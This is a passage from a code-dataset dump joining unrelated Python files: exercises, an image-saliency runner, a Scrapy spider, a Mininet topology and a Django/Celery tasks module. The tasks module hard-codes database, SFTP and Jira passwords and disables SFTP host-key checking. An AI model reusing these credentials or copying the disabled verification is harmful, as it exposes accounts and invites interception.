—\nB деревьев. В дни, когда оба лесоруба отдыхают, ни одно дерево не\nсрубается.\n\nФермер Николай хочет понять, за сколько дней лесорубы срубят все\nдеревья, и он сможет засеять кукурузное поле.\n\nТребуется написать программу, которая по заданным целым числам\nA, K, B, M и X определяет,\nза сколько дней все деревья в лесу будут вырублены.\n\"\"\"\n\n# после разбора\n\na, k, b, m, x = map(int, input().split())\n\nleft = 0\nright = x * 2 // a + 1\n\nwhile left < right:\n days = (left + right) // 2\n holidays_dmitry = days // k\n holidays_fedor = days // m\n lumber = (days - holidays_dmitry) * a + (days - holidays_fedor) * b\n if lumber < x:\n left = days + 1\n else:\n right = days\n\nprint(left)\n","sub_path":"lessons_5_6/task_6d.py","file_name":"task_6d.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290566921","text":"import argparse\nimport os\nfrom dataset.dataset import get_loader\nfrom solver import Solver\n\ncaltech_101_categories = ['accordion', 'airplanes', 'anchor', 'ant', 'BACKGROUND_Google', 'barrel', 'bass', 'beaver', 'binocular', 'bonsai',\n 'brain', 'brontosaurus', 'buddha', 'butterfly', 'camera', 'cannon', 'car_side', 'ceiling_fan', 'cellphone',\n 'chair', 'chandelier', 'cougar_body', 'cougar_face', 'crab', 'crayfish', 'crocodile', 'crocodile_head', 'cup',\n 'dalmatian', 'dollar_bill', 'dolphin', 'dragonfly', 'electric_guitar', 'elephant', 'emu', 'euphonium', 'ewer',\n 'Faces', 'Faces_easy', 'ferry', 'flamingo', 'flamingo_head', 'garfield', 'gerenuk', 'gramophone', 'grand_piano',\n 'hawksbill', 'headphone', 'hedgehog', 'helicopter', 'ibis', 'inline_skate', 'joshua_tree', 'kangaroo', 'ketch',\n 'lamp', 'laptop', 'Leopards', 'llama', 'lobster', 'lotus', 'mandolin', 'mayfly', 'menorah', 'metronome', 'minaret',\n 'Motorbikes', 'nautilus', 'octopus', 'okapi', 'pagoda', 'panda', 'pigeon', 'pizza', 'platypus', 'pyramid',\n 'revolver', 'rhino', 'rooster', 'saxophone', 'schooner', 'scissors', 'scorpion', 'sea_horse', 'snoopy',\n 'soccer_ball', 'stapler', 'starfish', 'stegosaurus', 'stop_sign', 'strawberry', 'sunflower', 'tick', 'trilobite',\n 'umbrella', 'watch', 'water_lilly', 'wheelchair', 'wild_cat', 'windsor_chair', 'wrench', 'yin_yang']\n\ndef get_test_info(sal_mode='e'):\n if sal_mode == 'e':\n image_root = './data/ECSSD/Imgs/'\n image_source = './data/ECSSD/test.lst'\n elif sal_mode == 'p':\n image_root = './data/PASCALS/Imgs/'\n image_source = './data/PASCALS/test.lst'\n elif sal_mode == 'd':\n image_root = './data/DUTOMRON/Imgs/'\n image_source = './data/DUTOMRON/test.lst'\n elif sal_mode == 'h':\n image_root = './data/HKU-IS/Imgs/'\n image_source = './data/HKU-IS/test.lst'\n elif sal_mode == 's':\n image_root = './data/SOD/Imgs/'\n image_source = './data/SOD/test.lst'\n elif sal_mode == 't':\n image_root = './data/DUTS-TE/Imgs/'\n image_source = './data/DUTS-TE/test.lst'\n elif sal_mode == 'm_r': # for speed test\n image_root = './data/MSRA/Imgs_resized/'\n image_source = './data/MSRA/test_resized.lst'\n elif sal_mode == 'robinson':\n image_root = './data/Robinson/Imgs/'\n image_source = './data/Robinson/Imgs/filename.txt'\n elif sal_mode == 'cifar100-category0':\n image_root = './data/cifar100/test/apple/'\n image_source = './data/cifar100/test/apple/test.txt'\n elif sal_mode == '101_ObjectCategories':\n image_root = './data/101_ObjectCategories/accordion/'\n image_source = './data/101_ObjectCategories/accordion/test.txt'\n else:\n for category in caltech_101_categories:\n if sal_mode == 'caltech101-' + category:\n image_root = './data/101_ObjectCategories/' + category + '/'\n image_source = './data/101_ObjectCategories/' + category + '/test.txt'\n print(\"sal_mode: in getting root/source directory\", sal_mode)\n return image_root, image_source\n\ndef main(config):\n if config.mode == 'train':\n train_loader = get_loader(config)\n run = 0\n while os.path.exists(\"%s/run-%d\" % (config.save_folder, run)):\n run += 1\n os.mkdir(\"%s/run-%d\" % (config.save_folder, run))\n os.mkdir(\"%s/run-%d/models\" % (config.save_folder, run))\n config.save_folder = \"%s/run-%d\" % (config.save_folder, run)\n train = Solver(train_loader, None, config)\n train.train()\n elif config.mode == 'test':\n #config.test_root, config.test_list = get_test_info(config.sal_mode)\n test_loader = get_loader(config, mode='test')\n if not os.path.exists(config.test_fold):\n os.mkdir(config.test_fold)\n test = Solver(None, test_loader, config)\n test.test()\n else:\n raise IOError(\"illegal input!!!\")\n\nif __name__ == '__main__':\n\n vgg_path = './dataset/pretrained/vgg16_20M.pth'\n resnet_path = './dataset/pretrained/resnet50_caffe.pth'\n\n parser = argparse.ArgumentParser()\n\n # Hyper-parameters\n parser.add_argument('--n_color', type=int, default=3)\n parser.add_argument('--lr', type=float, default=5e-5) # Learning rate resnet:5e-5, vgg:1e-4\n parser.add_argument('--wd', type=float, default=0.0005) # Weight decay\n parser.add_argument('--no-cuda', dest='cuda', action='store_false')\n\n # Training settings\n parser.add_argument('--arch', type=str, default='resnet') # resnet or vgg\n parser.add_argument('--pretrained_model', type=str, default=resnet_path)\n parser.add_argument('--epoch', type=int, default=24)\n parser.add_argument('--batch_size', type=int, default=1) # only support 1 now\n parser.add_argument('--num_thread', type=int, default=1)\n parser.add_argument('--load', type=str, default='')\n parser.add_argument('--save_folder', type=str, default='./results')\n parser.add_argument('--epoch_save', type=int, default=3)\n parser.add_argument('--iter_size', type=int, default=10)\n parser.add_argument('--show_every', type=int, default=50)\n\n # Train data\n parser.add_argument('--train_root', type=str, default='')\n parser.add_argument('--train_list', type=str, default='')\n\n # Testing settings\n parser.add_argument('--model', type=str, default=None) # Snapshot\n parser.add_argument('--test_fold', type=str, default=None) # Test results saving folder\n parser.add_argument('--sal_mode', type=str, default='e') # Test image dataset\n\n # Misc\n parser.add_argument('--mode', type=str, default='train', choices=['train', 'test'])\n config = parser.parse_args()\n\n # make ./results\n if not os.path.exists(config.save_folder):\n os.mkdir(config.save_folder)\n\n if not os.path.exists(config.test_fold):\n os.mkdir(config.test_fold)\n\n base_results_folder = config.test_fold\n if \"caltech101\" in config.sal_mode:\n for category in caltech_101_categories:\n # Get test set info\n test_root, test_list = get_test_info(config.sal_mode + '-' + category)\n config.test_root = test_root\n config.test_list = test_list\n\n config.test_fold = base_results_folder + '/' + category\n main(config)\n\n else:\n # Get test set info\n test_root, test_list = get_test_info(config.sal_mode)\n config.test_root = test_root\n config.test_list = test_list\n\n main(config)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386161380","text":"import os\nimport json\nimport shutil\nimport math as mt\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport pymysql\nimport pysftp\nfrom jira.client import JIRA\n\nfrom celery import task\nfrom django.core.mail import send_mail\nfrom django.db import connections\nfrom django.utils import timezone\n\nfrom home.models import Iteration\nfrom triggers.models import Directories, Messages\n\n\nfrom codes.iteration_files.postgres_dump import generate_jira_file_v4\nfrom codes.masters.update_hierarchy import master_hierarchy_flat\nfrom codes.v4_validation.kv_audits import kv_audits\nfrom celery.signals import worker_process_init\nfrom multiprocessing import current_process\n\n@worker_process_init.connect\ndef fix_multiprocessing(**kwargs):\n try:\n current_process()._config\n except AttributeError:\n current_process()._config = {'semprefix': '/mp'}\n\n#for connection with sql\nhostname = \"172.16.2.32\"\nport = 3306\nusername = \"shaun\" \npassword = \"shaun@123\"\ndefault_database = \"validationdb_fuzion\"\n\n#for connection with sftp\nhostname_sftp = \"niel-ftp.colpal.com\"\nport_sftp = 22\nusername_sftp = \"fractal\"\npassword_sftp = \"Fuke8ega\"\n\n\ndef dict_fetchall(cursor):\n desc = cursor.description\n return [dict(zip([col[0] for col in desc], row)) for row in cursor.fetchall()]\n\ndef execute_file_query(file):\n script=open(file,'r') #takes .txt file as input for script\n query=script.read()\n script.close()\n with connections['default'].cursor() as cur:\n cur.execute(query)\n dict_result = dict_fetchall(cur)\n result=pd.DataFrame(dict_result)\n return result\n\ndef execute_commit(query):\n conn = pymysql.connect(host=hostname,port=port,user=username,\n passwd=password,database=default_database,autocommit=True,local_infile=True)\n c = conn.cursor(pymysql.cursors.DictCursor)\n c.execute(query)\n c.close()\n conn.close()\n\ndef mysql_insert(data,iteration_name):\n with connections['default'].cursor() as cur:\n cur.execute(\"\"\"\n DELETE FROM mappingdb.jira_status where iteration like \"{iteration_name}\"\n \"\"\".format(iteration_name=iteration_name))\n cur.executemany(\"\"\"\n INSERT INTO mappingdb.jira_status(issue_key, country, subcategory, division, assignee_name, status, resolutiondate, iteration)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\",data)\n connections['default'].commit()\n\n\n\ndef convert_epoctime_to_string(epoctime):\n standard_time_format = datetime.fromtimestamp(epoctime).strftime('%Y-%m-%d %H:%M:%S')\n return standard_time_format\n\ndef to_datetime(date_time):\n py_datetime = datetime.strptime(date_time,'%Y-%m-%d %H:%M:%S')\n return py_datetime\n\n#upload file to sftp\ndef upload(localpath,remotepath):\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None \n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n sftp.put_d(localpath=localpath,remotepath=remotepath)\n file_list = sftp.listdir(remotepath)\n modified_file = []\n for f in file_list:\n modified_file.append(sftp.stat(remotepath+'/'+f).st_mtime)\n earliest_file_date_modified = convert_epoctime_to_string(min(modified_file))\n sftp.close()\n return earliest_file_date_modified\n\ndef gm_failure_mail():\n send_mail(\n 'Global Mapping Trigger Failed',\n 'Kindly Trigger Manually.',\n 'shaun.mendes@fractalanalytics.com',\n ['gaurav.acharekar@fractalanalytics.com','shaun.mendes@fractalanalytics.com'],\n fail_silently=False)\n\ndef gm_filetime_validation(filetime):\n current_filetime = to_datetime(filetime)\n current_time = datetime.now()\n difference =current_time - current_filetime\n if difference.seconds//3600 > 3:\n gm_failure_mail()\n return 'danger'\n else:\n return 'success'\n\n@task\ndef gm():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='script_path').path\n\n #local save path\n save_path=Directories.objects.get(purpose='save_path').path\n\n #sftp path\n sftp_path=Directories.objects.get(purpose='sftp_path').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n \n GM=script_path+'GM_script.txt'\n GM_file=execute_file_query(GM)\n\n msg = Messages(message_text = 'Global Mapping Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n GM_file_id=GM_file[['ID','DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n\n GM_file_id.to_csv(save_path+'Global_Mapping_with_id.csv',index=False)\n msg = Messages(message_text = 'Global Mapping with Id File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n GM_file=GM_file[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n GM_file.to_csv(save_path+'Global_Mapping.csv',index=False)\n msg = Messages(message_text = 'Global Mapping File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n scale=script_path+'Scale_script.txt'\n scale_file=execute_file_query(scale)\n scale_file=scale_file[['COUNTRY_NAME','SUBCATEGORY_NAME','VALUE','VOLUME']]\n scale_file.to_csv(save_path+'scale.csv',index=False)\n\n msg = Messages(message_text = 'Scale File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n variants=execute_file_query(script_path+'Variant_script.txt')\n map_gpt=execute_file_query(script_path+'map_gpt.txt')\n mas_gpt=execute_file_query(script_path+'mas_gpt.txt')\n\n GM_variant=pd.merge(GM_file,variants,how='left',left_on='GLOBAL_VARIANT',right_on='variant_name')\n\n GM_map_gpt=pd.merge(GM_variant,map_gpt,how='left',left_on='id',right_on='variantid')\n\n GM_mas_gpt=pd.merge(GM_map_gpt,mas_gpt,how='left',left_on='gptid',right_on='id')\n\n GM_gpt=GM_mas_gpt.rename(columns={'name':'GLOBAL_GPT'})\n\n GM_gpt=GM_gpt[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT','GLOBAL_GPT']]\n\n GM_gpt.to_csv(save_path+'Global_Mapping_GPT.csv',index=False)\n\n msg = Messages(message_text = 'Global Mapping GPT File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n \n msg = Messages(message_text = 'Upload Started', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n date_modified = upload(save_path,sftp_path)\n \n msg = Messages(message_text = 'Upload Successful', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n status = gm_filetime_validation(date_modified)\n\n msg = Messages(message_text = 'Process Complete Successfully \\n Time {}'.format(date_modified), posted_time = timezone.now() , status = status, trigger_id = 1)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 1)\n msg.save()\n\n@task\ndef example_task():\n print(\"Hello How are you\")\n\n\njira_options = {'server': 'https://fractalanalytics.atlassian.net'}\n@task \ndef jira_update():\n iteration_name = Iteration.objects.order_by('-id').first().iteration_name\n try:\n jira = JIRA(options=jira_options, basic_auth=('shaun.mendes@fractalanalytics.com', 'Shaun@123'))\n msg = Messages(message_text = 'Connection Established With Jira', posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n iteration_name = Iteration.objects.order_by('-id').first().iteration_name\n issues = jira.search_issues(\n 'project = CPGDH AND issuetype = \"GoLive Release\" AND Period = \"{0}\" ORDER BY updatedDate DESC'.format(iteration_name), maxResults=None)\n msg = Messages(message_text = \"Jira Data Obtained\", posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n data = [[i.key, i.raw['fields']['customfield_10024']['value'], i.raw['fields']\n ['customfield_10026']['value'], i.raw['fields']['customfield_11102']['value'], i.fields.assignee.name,\n i.fields.resolution.name if i.fields.status.name=='Closed' else i.fields.status.name,\n datetime.strptime(i.raw['fields']['resolutiondate'][:10],'%Y-%m-%d') if i.raw['fields']['resolutiondate'] else None,\n iteration_name\n ] for i in issues]\n msg = Messages(message_text = \"Writing to MYSQL\", posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n mysql_insert(data,iteration_name)\n msg = Messages(message_text = \"Data Inserted\", posted_time = timezone.now() , status = 'success' ,trigger_id = 2)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 2)\n msg.save()\n\n@task\ndef jira_update_v4():\n generate_jira_file_v4()\n \n@task \ndef update_hierarchy():\n master_hierarchy_flat()\n\n@task\ndef cp_extracts_download():\n from codes.sftp.sftp_files import download_udm_extracts\n download_udm_extracts()\n\n@task\ndef sftp_download(sftp_file_path, save_path):\n save_file_path = os.path.join(save_path,os.path.split(sftp_file_path)[1])\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None\n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n sftp.get(sftp_file_path,save_file_path)\n sftp.close()\n\n@task\ndef copy_file(file_path, copy_path):\n try:\n shutil.copy2(file_path,copy_path)\n except:\n pass\n\n#upload file to sftp\ndef upload_file(localfilepath,remotepath):\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None \n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n with sftp.cd(remotepath):\n sftp.put(localpath = localfilepath)\n file_list = sftp.listdir(remotepath)\n modified_file = []\n for f in file_list:\n modified_file.append(sftp.stat(remotepath+'/'+f).st_mtime)\n earliest_file_date_modified = convert_epoctime_to_string(min(modified_file))\n sftp.close()\n return earliest_file_date_modified\n\n@task\ndef l2g():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='local2global_script').path\n\n #local save path\n save_path=Directories.objects.get(purpose='local2global_save').path\n\n #sftp path\n sftp_path=Directories.objects.get(purpose='local2global_sftp').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 7)\n msg.save()\n \n l2g=script_path+'script.txt'\n l2g_file=execute_file_query(l2g)\n l2g_file=l2g_file[[\"Country\",\"Subcategory\",\"description\",\"istotal\",\"Channel\"]]\n msg = Messages(message_text = 'Local to Global RE Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 7)\n msg.save()\n savefilename = save_path+'LocalToGlobalRE.csv'\n l2g_file.to_csv(savefilename,index=False)\n msg = Messages(message_text = 'Local to Global RE Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 7)\n msg.save()\n\n msg = Messages(message_text = 'Upload Started', posted_time = timezone.now() , status = 'warning' ,trigger_id = 7)\n msg.save()\n\n date_modified = upload_file(savefilename,sftp_path)\n \n msg = Messages(message_text = 'Upload Successful with update time '+date_modified, posted_time = timezone.now() , status = 'success' ,trigger_id = 7)\n msg.save()\n \n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 7)\n msg.save()\n\n@task\ndef gm_file():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='script_path').path\n\n #local save path\n save_path=Directories.objects.get(purpose='gm_save_path').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 6)\n msg.save()\n \n GM=script_path+'GM_script.txt'\n GM_file=execute_file_query(GM)\n GM_file=GM_file[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n msg = Messages(message_text = 'Global Mapping Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 6)\n msg.save()\n GM_file.to_csv(save_path+'Global_Mapping.csv',index=False)\n msg = Messages(message_text = 'Global Mapping File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 6)\n msg.save()\n\n load_data_query = \"\"\"\n LOAD DATA LOCAL INFILE '{file_path}'\n INTO TABLE {table_name} FIELDS TERMINATED BY ',' \n ENCLOSED BY '\"' LINES TERMINATED BY '\\n' IGNORE 1 LINES;\n \"\"\".format(file_path = save_path+'Global_Mapping.csv', table_name = \"mappingdb.daily_global_mappings\")\n\n execute_commit(\"TRUNCATE TABLE {table_name}\".format(table_name=\"mappingdb.daily_global_mappings\"))\n execute_commit(load_data_query)\n\n msg = Messages(message_text = 'Data succeessfully loaded into mappingdb.daily_global_mappings', posted_time = timezone.now() , status = 'success', trigger_id = 6)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 6)\n msg.save()\n\n\n@task\ndef detail_audits():\n kv_audits()","sub_path":"triggers/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34897417","text":"import math\nimport numpy as np\nimport sympy as sp\n\n\n\ndef compute(r):\n return math.sin(r)\n\ndef lagrange(nodes):\n\n\n tmp_x_nodes = [node['X']for node in nodes]\n tmp_y_nodes = [node['Y']for node in nodes]\n\n x_nodes = np.asarray(tmp_x_nodes,dtype=np.float)\n y_nodes = np.asarray(tmp_y_nodes,dtype=np.float)\n\n x = sp.symbols('x')\n y = sp.symbols('y')\n\n pol_base = []\n pol_lag = []\n\n for i in range(len(x_nodes)):\n LUp = []\n LDown = []\n for j in range(len(nodes)):\n if j != i:\n express=(x-x_nodes[j])\n express_1=(x_nodes[i]-x_nodes[j])\n LUp.append(\"{\" + str(express) + \" \\over \" + str(express_1) + \"}\")\n LDown.append(express/express_1)\n pol_base.append([i, LUp])\n pol_lag.append(LDown)\n\n #print pol_base\n\n P=0\n product_result = []\n\n\n for n1 in range(len(pol_lag)):\n test = 1\n for n2 in range(len(pol_lag[n1])):\n test = test * pol_lag[n1][n2]\n\n ptoria = sp.expand(test)\n product_result.append([n1, sp.latex(ptoria), y_nodes[n1]])\n\n P = P + (test * y_nodes[n1])\n\n expt = sp.expand(P)\n latx = sp.latex(expt)\n\n response_data = {\n 'result': latx,\n 'basePol': pol_base,\n 'sumProduct': product_result,\n }\n\n return response_data\n","sub_path":"Polinomial_2/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288313488","text":"import cv2\n\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n resized = cv2.resize(image, dim, interpolation = inter)\n return resized\nimage=cv2.imread(\"BORI-11-page-001_working.jpg\")\nimage = image_resize(image, height = 2000)\ncv2.imwrite(\"BORI.jpg\",image)","sub_path":"docimage/resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226198795","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport scipy.spatial.distance as ssd\nimport scipy.stats as ss\nfrom escriu import *\n\n\ndef minpvalue(full):\n f=open(\"songs.txt\", \"r\")\n sample=f.read().strip().split(',')\n sample = [ float(x) for x in sample ]\n y1, y2 = np.array(sample), np.array(full)\n i, pvalues= 0, []\n minim=len(y1)\n ym=y2[0:minim]\n\n while minim+i<len(y2):\n x1 = np.linspace(1, len(y1), len(y1))\n xm = x1\n # Interpolating now, using linear, but you can do better based on your data\n f = interp1d(x1, y1)\n fm = interp1d(xm ,ym)\n\n points = 15\n\n xnew1 = np.linspace ( min(x1), max(x1), num = points)\n xnewm = np.linspace ( min(xm), max(xm), num = points)\n\n ynew1 = f(xnew1)\n ynewm = fm(xnewm)\n\n # Now compute correlations\n a=ssd.correlation(ynew1, ynewm) # Computes a distance measure based on correlation between the two vectors\n b=np.correlate(ynew1, ynewm, mode='valid') # Does a cross-correlation of same sized arrays and gives back correlation\n c=np.corrcoef(ynew1, ynewm) # Gives back the correlation matrix for the two arrays\n d=ss.spearmanr(ynew1, ynewm) # Gives the spearman correlation for the two arrays\n pvalues.append(abs(d[0]))\n i+=1\n ym=y2[i:minim+i]\n minpvalue=max(pvalues)\n return minpvalue\n","sub_path":"Antics/spear.py","file_name":"spear.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"170342784","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Guckenheimer spider created on top of the ATSSpider\nscrapy crawl guckenheimer -a url=\"http://www.guckenheimer.com/careers/\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://www.guckenheimer.com/careers/\n\"\"\"\nfrom urlparse import urljoin\nfrom re import compile\nfrom json import loads as json_loads\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, UrlJoin, ConvertDateString\n\n\nclass Guckenheimer(ATSSpider):\n\n name = \"guckenheimer\"\n api_re = compile('id=(.*)')\n api_link = \"\"\n current_page = 0\n total_pages = 1\n disable_default_field_extractors = True\n\n def parse(self, response):\n sel = Selector(response)\n api_link_id = sel.xpath(\n \"//script[contains(@src,'ATSNotifications.js')]/@src\"\n ).extract()\n if api_link_id:\n res = self.api_re.search(api_link_id[0])\n if res:\n self.api_link = urljoin(\n api_link_id[0],\n \"/ClientContent/GetJobBoardAdvSearch/%s\" % res.group(1)\n )\n yield Request(\n self.api_link+\"?page=1&rowsperpage=100\",\n callback=self.parse_api\n )\n\n def parse_api(self, response):\n self.current_page += 1\n try:\n resdata = json_loads(response.body)\n except:\n return\n\n if self.current_page == 1:\n self.expected_job_count = resdata['totalrows']\n self.total_pages = resdata['pages']\n\n for job in resdata['rows']:\n job_link = urljoin(\n response.url,\n \"/ClientContent/GetJobDescription/%s\" % job.get(\n 'PositionID', ''\n )\n )\n meta = {\n 'jobid': job.get('PositionID', ''),\n 'location': job.get('Location', ''),\n 'jobtype': job.get('EmploymentType', ''),\n 'date': job.get('PostDateString', ''),\n }\n yield Request(\n url=job_link, meta=meta, callback=self.parse_job_callback()\n )\n\n if self.current_page < self.total_pages:\n next_url = self.api_link+(\n \"?page=%s&rowsperpage=100\" % (self.current_page+1)\n )\n yield Request(url=next_url, callback=self.parse_api)\n\n def parse_job(self, response):\n try:\n details = json_loads(response.body)\n except:\n return\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value(\n 'referencenumber', str(response.meta['jobid']),\n Prefix(\"%s-\" % self.name)\n )\n loader.add_value('location', response.meta['location'])\n loader.add_value('jobtype', response.meta['jobtype'])\n loader.add_value(\n 'date', response.meta['date'], ConvertDateString(\"%m/%d/%Y\")\n )\n loader.add_value('description', details.get('description', ''))\n loader.add_value('title', details.get('positiontitle', ''))\n loader.add_value(\n 'url', \"/careers/?ATSPopupJob=%s\" % response.meta['jobid'],\n UrlJoin(self.start_urls[0])\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/guckenheimer.py","file_name":"guckenheimer.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281797297","text":"from mininet.topo import Topo\n\nfrom mininet.node import OVSKernelSwitch\nfrom mininet.link import TCLink\n\nclass SimpleTopo(Topo):\n\n def __init__( self ):\n \"Create simple topo topo.\"\n\n # Initialize topology\n Topo.__init__( self )\n\n # Add switches\n s1 = self.addSwitch( 's1', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:01' )\n s2 = self.addSwitch( 's2', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:02' )\n s3 = self.addSwitch( 's3', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:03' )\n s4 = self.addSwitch( 's4', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:04' )\n\n # Add hosts\n hostsNumber = 2\n userOneHost = self.addHost( 'User1', ip='10.0.0.101/24', cpu=.1/hostsNumber )\n\n httpLsHost = self.addHost( 'HTTP_LS', ip='10.0.0.1/24', cpu=.1/hostsNumber )\n httpSsHost = self.addHost( 'HTTP_SS', ip='10.0.0.2/24', cpu=.1/hostsNumber )\n\n\n # Add links between switches\n self.addLink( s1, s2, cls=TCLink , bw=10 )\n self.addLink( s1, s3, cls=TCLink , bw=10 )\n\n self.addLink( s2, s4, cls=TCLink , bw=10 )\n\n self.addLink( s3, s4, cls=TCLink , bw=10 )\n\n # Add links to services\n self.addLink( s4, httpLsHost, cls=TCLink )\n self.addLink( s4, httpSsHost, cls=TCLink )\n\n #Add links to users\n self.addLink( s1, userOneHost, cls=TCLink )\n\ntopos = { 'simpletopo': (lambda: SimpleTopo())}","sub_path":"scenarios/simple-net/mininet/manual/simple-topo.py","file_name":"simple-topo.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"93969910","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n nums_copy=nums\n a=0\n b=0\n same_flag=0\n #print(\"nums_copy\")\n\n #for k in nums_copy:\n # if k >=target :\n # del nums_copy[nums_copy.index(k):]\n # break\n \n k_index=0\n l_index=1\n for k in nums_copy:#a_index\n l_s_index=k_index+1\n l_index=l_s_index\n for l in nums_copy[l_s_index:]:#b_index \n if l+k == target:\n #print(\"itering1\")\n #print(\"l=\"+str(l))#debug\n #print(\"k=\"+str(k))#debug \n a=k_index\n b=l_index\n break\n l_index+=1\n k_index+=1\n \n\n index0=a\n index1=b\n \n \n res=[] \n #print(nums_copy)#debug\n if index0>index1 :\n res=[index1,index0]\n else :\n res=[index0,index1]\n \n return res\n \ns=Solution()\n#nums=[2, 7, 11, 15]\n#target=9\n#print(s.twoSum(nums, target))\n#\n#\n#nums=[2, 7, 11,2,15]\n#target=4\n#print(s.twoSum(nums, 